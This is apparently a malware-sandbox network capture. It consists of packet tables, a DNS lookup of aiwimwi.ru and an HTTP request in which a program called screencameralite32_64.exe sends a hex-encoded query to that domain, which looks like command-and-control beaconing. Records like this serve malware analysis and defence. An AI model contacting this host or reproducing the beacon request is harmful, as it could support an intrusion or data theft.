                                                            Oct 7, 2024 03:42:43.773667097 CEST5005280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:43.778620958 CEST8050051185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:43.778820038 CEST8050052185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:43.778866053 CEST5005180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:43.779031038 CEST5005280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:43.779031038 CEST5005280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:43.784111023 CEST8050052185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:44.463315010 CEST8050052185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:44.463475943 CEST5005280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:44.587807894 CEST5005280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:44.587930918 CEST5005380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:44.593175888 CEST8050053185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:44.593277931 CEST5005380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:44.593372107 CEST5005380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:44.593616962 CEST8050052185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:44.593899965 CEST5005280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:44.598611116 CEST8050053185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:45.282584906 CEST8050053185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:45.282696009 CEST5005380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:45.397274017 CEST5005380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:45.397522926 CEST5005480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:45.402678013 CEST8050054185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:45.402769089 CEST8050053185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:45.402770996 CEST5005480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:45.402837992 CEST5005380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:45.402929068 CEST5005480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:45.407820940 CEST8050054185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:46.194369078 CEST8050054185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:46.194451094 CEST5005480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:46.337280989 CEST5005480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:46.337722063 CEST5005580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:46.342636108 CEST8050054185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:46.342713118 CEST5005480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:46.342864990 CEST8050055185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:46.342957020 CEST5005580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:46.343224049 CEST5005580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:46.348143101 CEST8050055185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:47.051490068 CEST8050055185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:47.051855087 CEST5005580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.163093090 CEST5005580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.163340092 CEST5005680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.168443918 CEST8050056185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:47.168519020 CEST5005680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.168603897 CEST5005680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.168626070 CEST8050055185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:47.168695927 CEST5005580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.173401117 CEST8050056185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:47.863882065 CEST8050056185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:47.864173889 CEST5005680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.976191044 CEST5005680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.980638981 CEST5005780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.981372118 CEST8050056185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:47.981419086 CEST5005680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.985563993 CEST8050057185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:47.985743046 CEST5005780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.985889912 CEST5005780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:47.990647078 CEST8050057185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:48.674187899 CEST8050057185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:48.674462080 CEST5005780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:48.861721992 CEST5005780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:48.862015009 CEST5005880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:48.867109060 CEST8050058185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:48.867268085 CEST8050057185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:48.867322922 CEST5005880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:48.867322922 CEST5005780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:48.868442059 CEST5005880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:48.873270035 CEST8050058185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:49.578221083 CEST8050058185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:49.578424931 CEST5005880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:49.694375038 CEST5005880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:49.694638014 CEST5005980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:49.699505091 CEST8050059185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:49.699578047 CEST8050058185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:49.699605942 CEST5005980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:49.699641943 CEST5005880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:49.699740887 CEST5005980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:49.704488039 CEST8050059185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:50.395359993 CEST8050059185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:50.395648003 CEST5005980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:50.506737947 CEST5005980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:50.507150888 CEST5006080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:50.511984110 CEST8050059185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:50.512075901 CEST5005980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:50.512115955 CEST8050060185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:50.512188911 CEST5006080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:50.512280941 CEST5006080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:50.517070055 CEST8050060185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:51.216778040 CEST8050060185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:51.216893911 CEST5006080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:51.351416111 CEST5006080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:51.351804972 CEST5006180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:51.356671095 CEST8050060185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:51.356683969 CEST8050061185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:51.356735945 CEST5006080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:51.356893063 CEST5006180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:51.357134104 CEST5006180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:51.361929893 CEST8050061185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:52.047357082 CEST8050061185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:52.047574043 CEST5006180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:52.163270950 CEST5006180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:52.163356066 CEST5006280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:52.168565035 CEST8050062185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:52.168768883 CEST5006280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:52.168857098 CEST5006280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:52.169023991 CEST8050061185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:52.169249058 CEST5006180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:52.173947096 CEST8050062185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:52.909086943 CEST8050062185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:52.909204960 CEST5006280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.022622108 CEST5006280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.022917986 CEST5006380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.027895927 CEST8050063185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:53.027967930 CEST8050062185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:53.028031111 CEST5006380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.028048992 CEST5006280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.028098106 CEST5006380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.032939911 CEST8050063185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:53.787621021 CEST8050063185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:53.787719011 CEST5006380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.899172068 CEST5006380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.899465084 CEST5006480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.904616117 CEST8050064185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:53.904660940 CEST8050063185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:53.904714108 CEST5006480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.904730082 CEST5006380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.905524015 CEST5006480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:53.910584927 CEST8050064185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:54.697433949 CEST8050064185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:54.697840929 CEST5006480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:54.821732044 CEST5006480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:54.822165012 CEST5006580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:54.827502966 CEST8050064185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:54.827545881 CEST8050065185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:54.827572107 CEST5006480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:54.827805996 CEST5006580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:54.827805996 CEST5006580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:54.833015919 CEST8050065185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:55.515415907 CEST8050065185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:55.515667915 CEST5006580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:55.632464886 CEST5006580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:55.632951975 CEST5006680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:55.638376951 CEST8050065185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:55.638423920 CEST8050066185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:55.638587952 CEST5006580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:55.638587952 CEST5006680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:55.638679028 CEST5006680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:55.643826008 CEST8050066185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:56.350989103 CEST8050066185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:56.351203918 CEST5006680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:56.460820913 CEST5006680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:56.466593981 CEST8050066185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:56.697432041 CEST8050066185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:56.697680950 CEST5006680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:56.819812059 CEST5006680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:56.819976091 CEST5006780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:56.825273991 CEST8050067185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:56.825372934 CEST8050066185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:56.825390100 CEST5006780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:56.825548887 CEST5006680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:56.825587034 CEST5006780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:56.830945015 CEST8050067185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:57.534832954 CEST8050067185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:57.534955978 CEST5006780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:57.648091078 CEST5006780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:57.648468018 CEST5006880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:57.653832912 CEST8050067185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:57.653879881 CEST8050068185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:57.653908014 CEST5006780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:57.653961897 CEST5006880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:57.654122114 CEST5006880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:57.659230947 CEST8050068185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:58.352068901 CEST8050068185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:58.352170944 CEST5006880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:58.459867954 CEST5006880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:58.460247993 CEST5006980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:58.465718985 CEST8050068185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:58.465764046 CEST8050069185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:58.465799093 CEST5006880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:58.466001034 CEST5006980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:58.466001034 CEST5006980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:58.471360922 CEST8050069185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:59.284970999 CEST8050069185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:59.285211086 CEST5006980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:59.397748947 CEST5006980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:59.398107052 CEST5007080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:59.403652906 CEST8050069185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:59.403697968 CEST8050070185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:59.403889894 CEST5006980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:59.403978109 CEST5007080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:59.404062033 CEST5007080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:59.409220934 CEST8050070185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:00.084494114 CEST8050070185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:00.084616899 CEST5007080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:00.210122108 CEST5007080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:00.210304022 CEST5007180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:00.215518951 CEST8050071185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:00.215614080 CEST8050070185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:00.215614080 CEST5007180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:00.215811014 CEST5007180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:00.215814114 CEST5007080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:00.221113920 CEST8050071185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:00.913203955 CEST8050071185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:00.913274050 CEST5007180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.024285078 CEST5007180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.024669886 CEST5007280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.029620886 CEST8050072185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:01.029710054 CEST8050071185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:01.029767036 CEST5007180192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.029818058 CEST5007280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.029913902 CEST5007280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.035007000 CEST8050072185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:01.715522051 CEST8050072185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:01.715724945 CEST5007280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.837245941 CEST5007280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.837491989 CEST5007380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.842524052 CEST8050073185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:01.842603922 CEST5007380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.842722893 CEST5007380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.842737913 CEST8050072185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:01.842947006 CEST5007280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:01.847868919 CEST8050073185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:02.554652929 CEST8050073185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:02.556919098 CEST5007380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:02.718334913 CEST5007380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:02.719691992 CEST5007480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:02.723973036 CEST8050073185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:02.724052906 CEST5007380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:02.724777937 CEST8050074185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:02.724854946 CEST5007480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:02.725037098 CEST5007480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:02.730432987 CEST8050074185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:03.413173914 CEST8050074185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:03.413248062 CEST5007480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:03.534265995 CEST5007480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:03.534744978 CEST5007580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:03.539890051 CEST8050074185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:03.539935112 CEST8050075185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:03.539951086 CEST5007480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:03.540111065 CEST5007580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:03.540199041 CEST5007580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:03.545459032 CEST8050075185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:04.234046936 CEST8050075185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:04.234323025 CEST5007580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:04.352287054 CEST5007580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:04.352899075 CEST5007680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:04.357821941 CEST8050075185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:04.358246088 CEST5007580192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:04.358258009 CEST8050076185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:04.358678102 CEST5007680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:04.359433889 CEST5007680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:04.364579916 CEST8050076185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:05.058903933 CEST8050076185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:05.059238911 CEST5007680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:05.181536913 CEST5007680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:05.181890965 CEST5007780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:05.186856031 CEST8050077185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:05.186932087 CEST5007780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:05.186969995 CEST8050076185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:05.187062025 CEST5007680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:05.187531948 CEST5007780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:05.192601919 CEST8050077185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:05.915679932 CEST8050077185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:05.915771961 CEST5007780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.025120020 CEST5007780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.025434971 CEST5007880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.033076048 CEST8050078185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:06.033112049 CEST8050077185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:06.033174038 CEST5007880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.033174038 CEST5007780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.033303022 CEST5007880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.038590908 CEST8050078185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:06.740071058 CEST8050078185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:06.740206003 CEST5007880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.869457006 CEST5007980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.869617939 CEST5007880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.874835968 CEST8050079185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:06.875283957 CEST8050078185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:06.875453949 CEST5007980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.875453949 CEST5007980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.875562906 CEST5007880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:43:06.880640984 CEST8050079185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:07.572369099 CEST8050079185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:43:07.572458982 CEST5007980192.168.2.4185.208.158.248
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 7, 2024 03:41:57.153410912 CEST5996353192.168.2.4141.98.234.31
                                                            Oct 7, 2024 03:41:57.390940905 CEST5359963141.98.234.31192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 7, 2024 03:41:57.153410912 CEST192.168.2.4141.98.234.310xd1d8Standard query (0)aiwimwi.ruA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 7, 2024 03:41:57.390940905 CEST141.98.234.31192.168.2.40xd1d8No error (0)aiwimwi.ru185.208.158.248A (IP address)IN (0x0001)false
                                                            • aiwimwi.ru
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449747185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:41:57.458060026 CEST317OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf713c6ea96983f HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:41:58.187577963 CEST1232INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:41:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 34 30 30 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 62 37 36 35 62 62 33 37 34 66 30 36 37 62 37 33 32 35 36 63 30 65 30 64 35 30 65 63 61 34 32 63 64 37 64 62 30 31 62 66 64 33 32 38 38 33 38 65 33 31 36 62 38 36 37 63 37 35 61 61 35 65 61 34 65 65 37 35 62 37 66 34 33 65 63 32 66 36 36 39 34 33 64 37 39 38 63 66 66 31 32 64 65 65 64 39 30 39 39 32 35 63 39 36 61 39 63 31 33 64 38 35 30 38 66 32 31 62 31 35 39 61 64 65 61 35 39 33 66 65 63 37 62 64 37 65 33 37 65 62 63 38 35 65 63 64 35 34 61 65 36 33 35 63 66 31 33 32 62 35 66 35 62 33 65 65 31 32 34 37 36 31 36 36 37 62 39 65 38 38 37 66 66 38 36 32 64 35 31 65 64 35 61 37 65 33 66 66 63 32 62 34 33 66 33 66 39 66 39 38 61 66 63 33 34 37 61 61 34 65 64 34 37 39 39 38 32 66 65 36 34 32 35 31 [TRUNCATED]
